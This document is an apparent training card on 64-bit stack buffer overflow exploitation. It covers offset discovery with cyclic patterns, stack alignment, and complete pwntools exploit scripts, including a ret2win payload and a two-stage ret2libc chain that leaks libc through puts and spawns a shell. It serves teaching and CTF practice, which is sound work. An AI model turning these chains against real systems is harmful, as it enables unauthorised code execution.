Simple Buffer Overflow Without Protections: Return Address Overwrite and Program Flow Redirection
Theory
Why This Matters
The 64-bit stack buffer overflow is the starting point for the entire ROP/ret2libc exploit class. Even experienced analysts sometimes miscalculate the offset to saved RIP or forget the 16-byte stack alignment requirement, so an exploit that looks correct typically crashes inside libc instead of spawning a shell. NICE K0168 and S0131 require a methodical approach: use cyclic patterns to find the offset precisely, understand the 64-bit stack frame layout, and insert a single bare ret gadget where needed to realign the stack before reaching any libc function that uses aligned SSE instructions. This card consolidates the correct workflow for 64-bit stack overflows without protections.
Core Concept
The x86-64 stack frame at function entry (after push rbp; mov rbp, rsp):
Higher addresses (caller's frame)
[rbp + 0x08] saved RIP <- overwrite target (8 bytes)
[rbp + 0x00] saved RBP <- 8 bytes, corrupted by overflow
[rbp - 0x08] local vars...
[rsp] (end of frame)
Lower addresses
A buffer at [rbp - N] requires exactly N bytes to fill it, plus 8 bytes for saved RBP, before reaching saved RIP. The total offset from the buffer start to saved RIP is N + 8.
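The N + 8 arithmetic can be checked without a target binary. The sketch below models the frame as a byte array, assuming a hypothetical 64-byte buffer at [rbp - 0x40] with nothing between it and saved RBP; BUF_TO_RBP, offset_to_saved_rip, and simulate_overflow are illustrative names, not part of any tool.

```python
import struct

BUF_TO_RBP = 0x40        # hypothetical: buffer starts at [rbp - 0x40]
SLOT = 8                 # size of the saved RBP and saved RIP slots

def offset_to_saved_rip(buf_to_rbp: int) -> int:
    """Distance from the buffer start to the saved RIP slot: N + 8."""
    return buf_to_rbp + SLOT

def simulate_overflow(payload: bytes, buf_to_rbp: int = BUF_TO_RBP):
    """Copy payload into a modelled frame; return (saved_rbp, saved_rip)."""
    frame = bytearray(buf_to_rbp + 2 * SLOT)
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]
    # Saved RBP sits right after the buffer, saved RIP right after that.
    return struct.unpack_from("<QQ", frame, buf_to_rbp)

offset = offset_to_saved_rip(BUF_TO_RBP)
# Marker payload: B's land in saved RBP, C's land in saved RIP.
marker = b"A" * (offset - SLOT) + b"B" * SLOT + b"C" * SLOT
saved_rbp, saved_rip = simulate_overflow(marker)
print(f"offset={offset} saved_rbp={saved_rbp:#x} saved_rip={saved_rip:#x}")
```

A real frame may contain extra locals or padding between the buffer and saved RBP, which is why the offset should still be measured empirically.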
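Finding the offset with cyclic: pwntools generates a De Bruijn sequence in which every 4-byte substring is unique. Send cyclic(200) and trigger the crash. On x86-64 the pattern bytes form a non-canonical address, so the ret instruction faults before RIP is loaded; the overwritten return address is therefore the 8-byte value at the top of the stack ([RSP]) at the moment of the crash, not the value in RIP. Read that value in GDB or from the coredump and pass its low 4 bytes to cyclic_find(), which returns the byte offset.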
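To see why a unique-substring pattern pins down the offset, here is a minimal pure-Python sketch of a De Bruijn pattern and its lookup. It uses the standard Lyndon-word construction over a lowercase alphabet; make_pattern and find_offset are hypothetical stand-ins for illustration, not the pwntools API, and the crash value is simulated rather than taken from a real process.

```python
import string
from itertools import islice

def de_bruijn(alphabet: bytes, n: int):
    """Yield a De Bruijn sequence: every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def make_pattern(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the sequence over a-z."""
    return bytes(islice(de_bruijn(string.ascii_lowercase.encode(), n), length))

def find_offset(pattern: bytes, value: int, n: int = 4) -> int:
    """Locate the low n bytes of a little-endian register value in pattern."""
    needle = (value & ((1 << (8 * n)) - 1)).to_bytes(n, "little")
    return pattern.find(needle)

pattern = make_pattern(200)
# Simulated crash: pretend the qword at [RSP] was copied from pattern offset 72.
crash_qword = int.from_bytes(pattern[72:80], "little")
found = find_offset(pattern, crash_qword)
print(f"offset to saved RIP: {found}")
```

Masking to the low 4 bytes works because the register value is little-endian, so its low 32 bits are the first 4 pattern bytes in memory.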
16-byte alignment requirement: the x86-64 System V ABI requires RSP to be 16-byte aligned immediately before a call instruction. call pushes an 8-byte return address, so at the callee's first instruction RSP & 0xf == 0x8; the usual push rbp then brings it back to 0x0 inside the body. Compilers rely on this, and libc functions that use movaps (an aligned SSE move) on stack data fault when it does not hold. A ROP chain reaches functions through ret rather than call, so nothing guarantees the invariant: once the ret that transfers control to a libc function has executed, RSP & 0xf must be 0x8, exactly as it would be after a real call. If it is 0x0 instead, insert one bare ret gadget before the function address; each extra ret shifts RSP by 8 and flips the alignment.
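The alignment rule is easier to follow as a step-by-step walk of RSP. The sketch below tracks RSP & 0xf through a normal call into a vulnerable function and out through an overwritten return address. The starting RSP value is hypothetical; only its low nibble matters.

```python
def low_nibble(rsp: int) -> int:
    """Alignment of RSP relative to a 16-byte boundary."""
    return rsp & 0xF

rsp = 0x7FFFFFFFE000              # hypothetical; 16-byte aligned before `call vuln`
before_call = low_nibble(rsp)     # 0x0, as the ABI requires

rsp -= 8                          # call pushes the return address
at_entry = low_nibble(rsp)        # 0x8 at vuln's first instruction

rsp -= 8                          # push rbp
in_body = low_nibble(rsp)         # 0x0 inside the function body

rsp += 8                          # leave (pop rbp) on the way out
rsp += 8                          # ret pops the overwritten saved RIP
direct_entry = low_nibble(rsp)    # 0x0: target function is entered misaligned

rsp += 8                          # one extra bare `ret` gadget pops another slot
with_extra_ret = low_nibble(rsp)  # 0x8: same state as after a real call

print(hex(at_entry), hex(direct_entry), hex(with_extra_ret))
```

This is why a plain return-to-function payload usually needs exactly one bare ret in front of the function address.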
Technical Deep-Dive
Step 1 — Find RIP offset with cyclic:
from pwn import *
context.arch = 'amd64'
# Generate cyclic pattern
pattern = cyclic(200)
print(f"Pattern (first 20): {pattern[:20]}")
# Send to binary; it will crash with a specific value in RIP
p = process('./simple_bof')
p.sendline(pattern)
p.wait()
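# Method A: use coredump (core dumps must be enabled, e.g. ulimit -c unlimited)
core = Coredump('./core')
# The pattern is a non-canonical address, so ret faults before RIP is loaded.
# The overwritten return address is still the qword at the top of the stack.
saved = core.read(core.rsp, 8)
print(f"Return address at crash: {u64(saved):#x}")
offset = cyclic_find(saved[:4]) # cyclic works on 4-byte substrings by default
print(f"Offset to saved RIP: {offset}")
# Method B: use GDB
# (gdb) run < <(python3 -c "import sys; from pwn import *; sys.stdout.buffer.write(cyclic(200))")
# (gdb) x/gx $rsp
# Then: cyclic_find(value & 0xffffffff)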
Step 2 — Verify offset and build payload:
from pwn import *
elf = ELF('./simple_bof')
p = process('./simple_bof')
offset = 72 # from cyclic analysis
win_addr = elf.sym['win']
ret_gadget = 0x40101a # bare ret for alignment
log.info(f'win() @ {win_addr:#x}')
# Why the extra ret: returning straight into win() leaves RSP & 0xf == 0x0 at its
# first instruction, not the 0x8 that a real call would leave.
# If win() calls system(), puts(), printf(), etc., a movaps on the stack may then fault.
# One ret_gadget before win_addr shifts RSP by 8 and restores the expected alignment.
payload = b'A' * offset
payload += p64(ret_gadget) # alignment
payload += p64(win_addr) # jump to win()
p.sendline(payload)
p.interactive()
Step 3 — Determine whether alignment is needed:
# Rule of thumb (assumes the vulnerable function itself was entered by a normal call):
# The saved RIP slot sits at an address where (addr & 0xf) == 0x8.
# Number the 8-byte chain slots from 0, starting at the saved RIP slot.
# A function whose address sits in slot k is entered with RSP & 0xf == (8 * k) & 0xf.
# If k is odd: RSP & 0xf == 0x8 at entry, aligned (no extra ret needed)
# If k is even: RSP & 0xf == 0x0 at entry, misaligned (needs one extra ret)
# Example: pop_rdi, arg, system puts system in slot 2, so one ret must be added.
# The offset to saved RIP does not affect alignment; only the slot position does.
# This arithmetic is subtle -- always verify in GDB with "p $rsp & 0xf"
# Empirical check in GDB:
# (gdb) start < exploit_input
# (gdb) break *system
# (gdb) continue
# (gdb) p $rsp & 0xf
# Should be 0x8 at the function's first instruction. If 0x0: add one p64(ret_gadget) to the chain.
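The slot-parity rule can be turned into a small helper that decides whether a chain needs the extra ret. This is a sketch under the assumption that the vulnerable function was entered by a normal call, so the saved RIP slot sits at an address ending in 0x8. entry_alignment and aligned_chain are hypothetical helper names, and the BINSH and SYSTEM addresses are made-up placeholders.

```python
import struct
from typing import List

def entry_alignment(slot_index: int) -> int:
    """RSP & 0xf at the first instruction of a function whose address
    sits in chain slot `slot_index` (slot 0 = overwritten saved RIP)."""
    return (8 * slot_index) & 0xF

def aligned_chain(slots: List[int], func_index: int, ret_gadget: int) -> List[int]:
    """Prepend one bare ret if the function would be entered misaligned."""
    if entry_alignment(func_index) == 0x8:
        return list(slots)
    return [ret_gadget] + list(slots)

POP_RDI = 0x401263        # gadget address used in this card's examples
RET = 0x40101A            # bare ret used in this card's examples
BINSH = 0x7FFFF7F5A678    # hypothetical address of "/bin/sh"
SYSTEM = 0x7FFFF7E50D60   # hypothetical address of system()

chain = aligned_chain([POP_RDI, BINSH, SYSTEM], func_index=2, ret_gadget=RET)
payload_tail = b"".join(struct.pack("<Q", q) for q in chain)
print([hex(q) for q in chain])
```

The helper only encodes the arithmetic; the GDB check remains the authoritative test, since a caller that is itself misaligned invalidates the assumption.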
Complete 64-bit overflow exploit with full ASLR bypass (linking to other techniques):
from pwn import *
elf = ELF('./simple_bof')
libc = ELF('./libc.so.6')
p = process('./simple_bof')
offset = 72
pop_rdi = 0x401263
ret_gadget = 0x40101a
# Stage 1: leak libc (ret2libc.v2 technique)
payload1 = b'A' * offset
payload1 += p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
p.sendline(payload1)
# puts() stops at the first NUL, so only the low 6 address bytes arrive; pad to 8
leak = u64(p.recvuntil(b'\n', drop=True).ljust(8, b'\x00'))
libc.address = leak - libc.sym['puts']
log.info(f'libc base: {libc.address:#x}')
# Stage 2: shell (ret2libc.v2 / one_gadget)
og = libc.address + 0x4f432 # one_gadget with [rsp+0x40]==NULL constraint (example)
payload2 = b'A' * offset
payload2 += p64(ret_gadget) # alignment
payload2 += p64(og)
p.sendline(payload2)
p.interactive()
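The leak-parsing step in Stage 1 is a common source of silent errors, so it helps to isolate the arithmetic. The sketch below parses a puts() output line and derives the libc base with a page-alignment sanity check. PUTS_OFFSET and the sample line are hypothetical values chosen for illustration; real offsets come from the target's libc.so.6.

```python
import struct

PUTS_OFFSET = 0x80E50     # hypothetical offset of puts inside libc

def parse_leak(line: bytes) -> int:
    """Turn the bytes printed by puts(&got_entry) into a 64-bit address."""
    raw = line[:-1] if line.endswith(b"\n") else line   # drop only the newline
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"unexpected leak length: {len(raw)}")
    # puts() stops at the first NUL, so the high zero bytes must be restored.
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]

def libc_base(leak: int, symbol_offset: int) -> int:
    """Subtract the symbol offset and check the result is page aligned."""
    base = leak - symbol_offset
    if base & 0xFFF:
        raise ValueError(f"base {base:#x} is not page aligned; wrong libc or bad leak")
    return base

sample_line = b"\x50\x0e\xe8\xf7\xff\x7f\n"   # simulated output, 6 address bytes
leak = parse_leak(sample_line)
base = libc_base(leak, PUTS_OFFSET)
print(f"leak={leak:#x} base={base:#x}")
```

A base that is not page aligned almost always means the wrong libc version or stray output mixed into the leak.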
Reverse Engineering Methodology
- Use cyclic(200) → crash → cyclic_find(value at [RSP]) as the first step every time. Do not guess the offset from the buffer declaration without empirical verification: struct padding and compiler decisions affect the actual layout.
- Confirm the offset one more time: send b'A' * (offset - 8) + b'B' * 8 + b'C' * 8 and verify in GDB that RBP = 0x4242424242424242 (BBBBBBBB) and that the value at [RSP] when ret faults is 0x4343434343434343 (CCCCCCCC).
- Determine alignment: in GDB, break at the target function's first instruction (break *func) and check $rsp & 0xf. A function reached by a real call sees 0x8 there, because the call pushed 8 bytes onto a 16-byte-aligned stack. If the function is reached via ret and you see 0x0, the chain is misaligned; add one bare ret.
- Search for the bare ret gadget: ROPgadget --binary ./binary | grep ": ret$". It is almost always present, for example at the end of _init near the PLT stubs.
Common Reversing Errors
- cyclic_find returning wrong offset on 64-bit: by default cyclic_find searches for a 4-byte substring, but the overwritten return address holds 8 bytes of the pattern. Use cyclic_find(value & 0xffffffff) to search for the low 4 bytes, or generate and search with 8-byte patterns: cyclic(200, n=8) and cyclic_find(value, n=8).
- Forgetting saved RBP in the offset: the layout is [buffer][saved_RBP][saved_RIP]. Cyclic fills buffer AND saved_RBP. The offset to RIP includes the saved RBP slot (8 bytes). cyclic_find gives the offset to the start of the saved RIP slot, not the buffer end.
- Off-by-one-slot alignment: inserting one extra ret either fixes or breaks alignment, because it shifts RSP by 8. Two extra ret gadgets shift RSP by 16 and have no net effect on alignment. If unsure, try with and without one extra ret and observe in GDB.
- Payload delivery truncated: gets() stops at the first newline (\x0a); fgets(buf, N, stdin) reads at most N-1 bytes and also stops after a newline. If the payload is longer than the read limit, or contains \x0a before its end, the remaining bytes are not delivered. Verify the total payload length and contents against the input function.
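The delivery pitfalls above can be checked before sending anything. The sketch below models how much of a payload gets() and fgets() would store, following their documented C behaviour; delivered_prefix is a hypothetical helper name, and the 0x40100a address is chosen only because its low byte is a newline.

```python
import struct
from typing import Optional

def delivered_prefix(payload: bytes, reader: str, limit: Optional[int] = None) -> bytes:
    """Return the part of `payload` that the named C input function stores."""
    if reader == "gets":
        # gets() reads up to the first newline and discards it.
        end = payload.find(b"\n")
        return payload if end == -1 else payload[:end]
    if reader == "fgets":
        if limit is None:
            raise ValueError("fgets needs the buffer size N")
        # fgets() stores at most N-1 bytes and keeps the newline if it sees one.
        chunk = payload[:limit - 1]
        end = chunk.find(b"\n")
        return chunk if end == -1 else chunk[:end + 1]
    raise ValueError(f"unknown reader: {reader}")

# An address whose low byte is 0x0a cuts the payload at the saved RIP slot.
payload = b"A" * 72 + struct.pack("<Q", 0x40100A)
got = delivered_prefix(payload, "gets")
print(f"sent {len(payload)} bytes, gets() stored {len(got)}")

# A 64-byte fgets() buffer never reaches offset 72 at all.
print(f"fgets(buf, 64) stored {len(delivered_prefix(payload, 'fgets', 64))}")
```

If the stored length is shorter than the payload, pick a different gadget address or a different input path rather than debugging the chain itself.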